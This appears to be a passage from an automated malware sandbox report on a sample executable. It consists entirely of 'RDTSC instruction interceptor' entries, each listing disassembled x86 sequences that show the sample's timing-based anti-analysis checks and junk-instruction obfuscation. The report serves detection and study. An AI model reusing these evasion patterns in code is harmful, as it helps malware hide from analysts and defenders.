                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110394 second address: 5110398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110398 second address: 511039C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130664 second address: 513066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513066B second address: 513069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2C619167h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513069B second address: 5130713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F2A2CEBE35Bh 0x0000000c add al, 0000005Eh 0x0000000f jmp 00007F2A2CEBE369h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushad 0x0000001c mov bx, cx 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007F2A2CEBE362h 0x00000026 xor ecx, 16EFB688h 0x0000002c jmp 00007F2A2CEBE35Bh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2A2CEBE365h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130713 second address: 5130719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130719 second address: 5130728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130728 second address: 513072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513072C second address: 5130747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130747 second address: 51307B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c mov cl, A9h 0x0000000e pop edi 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 jmp 00007F2A2C61915Eh 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F2A2C619161h 0x0000001e or cl, 00000076h 0x00000021 jmp 00007F2A2C619161h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 call 00007F2A2C61915Eh 0x0000002e pop esi 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130830 second address: 5130834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130834 second address: 5130838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130838 second address: 513083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513083E second address: 513085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2C61915Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51308A0 second address: 5130904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 call 00007F2A2CEBE35Bh 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007F2A2CEBE365h 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d pushfd 0x0000001e jmp 00007F2A2CEBE35Fh 0x00000023 sub eax, 3508B15Eh 0x00000029 jmp 00007F2A2CEBE369h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130904 second address: 5130909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130909 second address: 512005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 96h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F2A2CEBE352h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F2A2CEBE357h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F2A313EB94Bh 0x0000002a mov edi, edi 0x0000002c jmp 00007F2A2CEBE35Fh 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F2A2CEBE364h 0x00000039 and si, FF98h 0x0000003e jmp 00007F2A2CEBE35Bh 0x00000043 popfd 0x00000044 movzx esi, dx 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d mov edi, ecx 0x0000004f popad 0x00000050 mov ax, BC3Fh 0x00000054 popad 0x00000055 xchg eax, ebp 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F2A2CEBE361h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512005E second address: 51200A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C619167h 0x00000009 jmp 00007F2A2C619163h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2A2C61915Bh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51200A1 second address: 51200D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2CEBE35Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51200D0 second address: 5120113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2A2C61915Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, esi 0x00000015 jmp 00007F2A2C619168h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120113 second address: 5120127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bx, 4520h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120127 second address: 512012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512012B second address: 5120131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120131 second address: 512018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F2A2C619164h 0x00000011 adc cl, FFFFFFC8h 0x00000014 jmp 00007F2A2C61915Bh 0x00000019 popfd 0x0000001a mov dx, ax 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F2A2C619165h 0x00000024 xchg eax, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512018F second address: 51201A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51201DF second address: 512027B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C61915Eh 0x00000009 sbb si, FB48h 0x0000000e jmp 00007F2A2C61915Bh 0x00000013 popfd 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub edi, edi 0x0000001b pushad 0x0000001c mov si, bx 0x0000001f pushfd 0x00000020 jmp 00007F2A2C61915Dh 0x00000025 adc al, 00000066h 0x00000028 jmp 00007F2A2C619161h 0x0000002d popfd 0x0000002e popad 0x0000002f inc ebx 0x00000030 jmp 00007F2A2C61915Eh 0x00000035 test al, al 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F2A2C61915Eh 0x0000003e xor esi, 5A37AB38h 0x00000044 jmp 00007F2A2C61915Bh 0x00000049 popfd 0x0000004a popad 0x0000004b je 00007F2A2C619331h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F2A2C61915Ch 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512027B second address: 512028A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120354 second address: 5120369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F2A2C61915Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120369 second address: 51203D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test eax, eax 0x00000008 pushad 0x00000009 mov esi, ebx 0x0000000b mov ecx, ebx 0x0000000d popad 0x0000000e jg 00007F2A9D7FC46Bh 0x00000014 pushad 0x00000015 mov ebx, 359F6EAAh 0x0000001a call 00007F2A2CEBE35Bh 0x0000001f pushfd 0x00000020 jmp 00007F2A2CEBE368h 0x00000025 sbb ecx, 4ADDB898h 0x0000002b jmp 00007F2A2CEBE35Bh 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 js 00007F2A2CEBE3DBh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F2A2CEBE362h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51203D5 second address: 51203E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2C61915Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51203E7 second address: 512040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2A2CEBE369h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 512040F second address: 5120415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120415 second address: 5120469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, E8h 0x00000005 mov bl, FCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F2A9D7FC3D2h 0x00000010 pushad 0x00000011 mov cx, F193h 0x00000015 call 00007F2A2CEBE368h 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebx, dword ptr [ebp+08h] 0x00000021 jmp 00007F2A2CEBE367h 0x00000026 lea eax, dword ptr [ebp-2Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120469 second address: 5120484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120484 second address: 51204CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F2A2CEBE35Ch 0x00000010 mov dl, ah 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov ch, 95h 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c jmp 00007F2A2CEBE35Eh 0x00000021 nop 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51204CE second address: 51204E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 movsx ebx, ax 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51204E2 second address: 51204FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51205C8 second address: 51205CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51205CE second address: 51205DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2CEBE35Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51205DF second address: 51205E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 51205E3 second address: 5110DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop ecx 0x00000011 mov si, di 0x00000014 popad 0x00000015 popad 0x00000016 je 00007F2A9D7FC3B2h 0x0000001c xor eax, eax 0x0000001e jmp 00007F2A2CE97A8Ah 0x00000023 pop esi 0x00000024 pop edi 0x00000025 pop ebx 0x00000026 leave 0x00000027 retn 0004h 0x0000002a nop 0x0000002b xor ebx, ebx 0x0000002d cmp eax, 00000000h 0x00000030 je 00007F2A2CEBE4B3h 0x00000036 call 00007F2A313DC5A6h 0x0000003b mov edi, edi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110DD0 second address: 5110DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, 55h 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110DD7 second address: 5110DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2CEBE35Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110DF8 second address: 5110E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110E07 second address: 5110E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F2A2CEBE35Bh 0x0000000c sub ch, 0000002Eh 0x0000000f jmp 00007F2A2CEBE369h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, ecx 0x0000001e mov bl, cl 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110E42 second address: 5110E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110E47 second address: 5110E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2A2CEBE366h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110E6C second address: 5110ED4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2A2C619163h 0x00000008 adc ah, 0000004Eh 0x0000000b jmp 00007F2A2C619169h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jmp 00007F2A2C619160h 0x00000018 popad 0x00000019 xchg eax, ecx 0x0000001a jmp 00007F2A2C619160h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F2A2C61915Eh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110ED4 second address: 5110EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2CEBE35Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110EE6 second address: 5110EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110EF5 second address: 5110EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5110EFB second address: 5110F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C619161h 0x00000009 adc ecx, 4F1D84F6h 0x0000000f jmp 00007F2A2C619161h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F2A2C619160h 0x0000001b adc ax, 3618h 0x00000020 jmp 00007F2A2C61915Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov dword ptr [ebp-04h], 55534552h 0x00000030 pushad 0x00000031 mov al, 63h 0x00000033 push eax 0x00000034 push edx 0x00000035 mov cx, di 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120AEA second address: 5120B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A2CEBE369h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F2A2CEBE35Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F2A2CEBE369h 0x00000020 and ax, 85A6h 0x00000025 jmp 00007F2A2CEBE361h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120B61 second address: 5120BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C619167h 0x00000009 adc cx, B8DEh 0x0000000e jmp 00007F2A2C619169h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [75AB459Ch], 05h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F2A2C619169h 0x00000029 add al, FFFFFFC6h 0x0000002c jmp 00007F2A2C619161h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F2A2C619160h 0x00000038 and cx, EA68h 0x0000003d jmp 00007F2A2C61915Bh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120BFC second address: 5120C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120C7D second address: 5120CAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A2C619161h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120CAA second address: 5120D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F2A2CEBE361h 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a call 00007F2A2CEBE368h 0x0000001f mov ebx, eax 0x00000021 pop ecx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push ebx 0x00000026 pop esi 0x00000027 popad 0x00000028 popad 0x00000029 pop eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120D07 second address: 5120D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120D0D second address: 5120D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5120D12 second address: 5120D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F2A9CF4DF9Fh 0x0000000e push 75A52B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [75AB4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F2A2C619165h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130932 second address: 5130936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130936 second address: 513093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 513093C second address: 5130942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130942 second address: 5130946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe | RDTSC instruction interceptor: First address: 5130946 second address: 513094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
